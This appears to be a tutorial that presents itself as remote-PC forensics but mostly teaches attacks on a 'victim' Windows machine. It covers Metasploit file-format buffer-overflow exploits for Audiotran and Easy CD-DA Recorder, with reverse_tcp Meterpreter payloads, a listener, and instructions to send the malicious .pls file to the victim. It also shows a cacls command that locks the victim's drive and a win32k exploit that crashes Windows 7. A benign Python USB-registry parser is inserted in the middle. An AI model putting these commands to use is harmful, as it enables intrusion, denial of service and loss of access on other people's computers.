Forensics Investigation of Remote PC (Part 2)

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you have a meterpreter session, use the 'shell' command to get a command prompt on the target.

How to Find the System Boot Time and Original Install Date

systeminfo - Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties such as RAM, disk space, and network cards. Its output includes the "System Boot Time" and "Original Install Date" fields.



How to Detect the Last Connected USB Storage Devices

reg query hklm\system\CurrentControlSet\Enum\usbstor
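As an added example (not part of the original tutorial), a Python parser for the USBSTOR query above when run with the /s switch, which also lists the instance subkeys: it pulls vendor, product, revision and serial number out of each key path and flags Windows-generated instance IDs that do not identify a unique device. The sample output below is constructed, not captured from a real host.

```python
import re
# Constructed sample of `reg query HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR /s`
# output (made up for this example, not captured from any real host).
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR\Disk&Ven_SanDisk&Prod_Cruzer_Glide&Rev_1.00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR\Disk&Ven_SanDisk&Prod_Cruzer_Glide&Rev_1.00\4C530001234567890123&0
    FriendlyName    REG_SZ    SanDisk Cruzer Glide USB Device
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR\Disk&Ven_Generic&Prod_Flash_Disk&Rev_8.07
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR\Disk&Ven_Generic&Prod_Flash_Disk&Rev_8.07\7&1a2b3c4d&0&_&0
    FriendlyName    REG_SZ    Generic Flash Disk USB Device
"""
# Class key: <type>&Ven_<vendor>&Prod_<product>&Rev_<rev>, optionally followed by
# the instance subkey "<serial>&<port>" that reg query /s lists beneath it.
KEY_RE = re.compile(
    r"^HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR\\"
    r"(?P<dtype>[^&\\]+)&Ven_(?P<vendor>[^&\\]*)&Prod_(?P<product>[^&\\]*)"
    r"&Rev_(?P<rev>[^\\]*)(?:\\(?P<instance>[^\\]+))?\s*$", re.IGNORECASE)
VALUE_RE = re.compile(r"^\s{4}(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.*)$")


def parse_usbstor(text):
    """Return one dict per USB storage device instance found in the output."""
    devices, current = [], None
    for line in text.splitlines():
        key = KEY_RE.match(line)
        if key is None:
            val = VALUE_RE.match(line)
            if val and current is not None:
                current["values"][val.group("name")] = val.group("data")
            continue
        inst = key.group("instance")
        if inst is None:      # class key alone; the serial is in the instance subkey
            current = None
            continue
        current = {
            "type": key.group("dtype"), "vendor": key.group("vendor"),
            "product": key.group("product"), "revision": key.group("rev"),
            "serial": inst.rsplit("&", 1)[0],   # strip the trailing "&<port>" suffix
            # Windows fabricates an instance ID with '&' as its 2nd character when the
            # device reports no serial number, so it does not pin down one unique stick.
            "unique_serial": inst[1:2] != "&",
            "values": {},
        }
        devices.append(current)
    return devices


if __name__ == "__main__":
    for d in parse_usbstor(SAMPLE):
        print(d["vendor"], d["product"], d["serial"], d["values"].get("FriendlyName"))
```

Feed it the saved output of the query (for example redirected to a file with > usb.txt) to get a device list that can be matched against an inventory of approved media.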


How to View Recently Visited Documents

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs




How to View the Last Commands Used in the Run Dialog Box

reg query hkey_current_user\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU


How to View Installed Software

reg query hkcu\software


How to Find All Installed Drivers

driverquery - Displays a list of all installed device drivers and their properties.


How to Lock a Drive of a Remote Windows Victim PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you have a meterpreter session, use the 'shell' command to get a command prompt on the target.

Type cacls (drive name) /e /p everyone:n and press Enter, for example cacls E: /e /p everyone:n. This will lock the E: drive by replacing the access rights of Everyone with "None".



Solution for Unlocking

Now right-click on your E: drive --> Properties --> click the "Security" tab --> click Continue.

Check the "Full Control" check box --> click OK.



Parameters

FileName             Required. Displays the DACLs of the specified files.
/t                   Changes the DACLs of the specified files in the current directory and all subdirectories.
/e                   Edits a DACL instead of replacing it.
/c                   Continues to change DACLs, ignoring errors.
/g User:permission   Grants access rights to the specified user. The table below lists valid values for permission.
/p User:permission   Replaces the access rights of the specified user (the switch used in the lock command above).

Value   Description
n       None
r       Read
w       Write
c       Change (Write)
f       Full Control

Hack Remote Windows PC using Audiotran PLS File Stack Buffer Overflow

This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4. An attacker must send the file to the victim, and the victim must open it. Alternatively, it may be possible to execute code remotely via an embedded PLS file within a browser when the PLS extension is registered to Audiotran. This alternate vector has not been tested and cannot be exercised directly with this module.

Exploit Targets
Audiotran 1.4.2.4

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open a Kali terminal and type msfconsole


Now type use exploit/windows/fileformat/audiotran_pls_1424
msf exploit (audiotran_pls_1424)>set payload windows/meterpreter/reverse_tcp
msf exploit (audiotran_pls_1424)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (audiotran_pls_1424)>exploit


After the malicious .pls file is generated successfully, it is stored on your local computer at:
/root/.msf4/local/msf.pls


Now we need to set up a listener to handle the reverse connection the victim's machine sends when the exploit executes successfully.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.6
exploit

Now send the msf.pls file to the victim. As soon as they download and open it, you get a meterpreter shell on the victim's computer.


Hack Remote Windows PC using Easy CD-DA Recorder PLS Buffer Overflow

This module exploits a stack-based buffer overflow vulnerability in Easy CD-DA Recorder 2007, caused by a long string in a playlist entry. By persuading the victim to open a specially crafted .PLS file, a remote attacker could execute arbitrary code on the system or cause the application to crash. This Metasploit module has been tested successfully on Windows XP SP3 and Windows 7 SP1.

Exploit Targets
Easy CD-DA Recorder 2007

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open a Kali terminal and type msfconsole


Now type use exploit/windows/fileformat/easycdda_pls_bof
msf exploit (easycdda_pls_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (easycdda_pls_bof)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (easycdda_pls_bof)>exploit


After the malicious .pls file is generated successfully, it is stored on your local computer at:
/root/.msf4/local/msf.pls


Now we need to set up a listener to handle the reverse connection the victim's machine sends when the exploit executes successfully.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.6
exploit

Now send the msf.pls file to the victim. As soon as they download and open it, you get a meterpreter shell on the victim's computer.


How to Perform a Blue Screen of Death Attack on a Remote Windows 7 PC

This Metasploit module exploits a vulnerability in win32k.sys where, under specific conditions, TrackPopupMenuEx will pass a NULL pointer to the MNEndMenuState procedure. This Metasploit module has been tested successfully on Windows 7 SP0 and Windows 7 SP1.

Exploit Targets
Windows 7

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Now open a Kali terminal and type msfconsole


Now type use exploit/windows/local/ms13_081_track_popup_menu
msf exploit (ms13_081_track_popup_menu)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms13_081_track_popup_menu)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (ms13_081_track_popup_menu)>set session 1
msf exploit (ms13_081_track_popup_menu)>exploit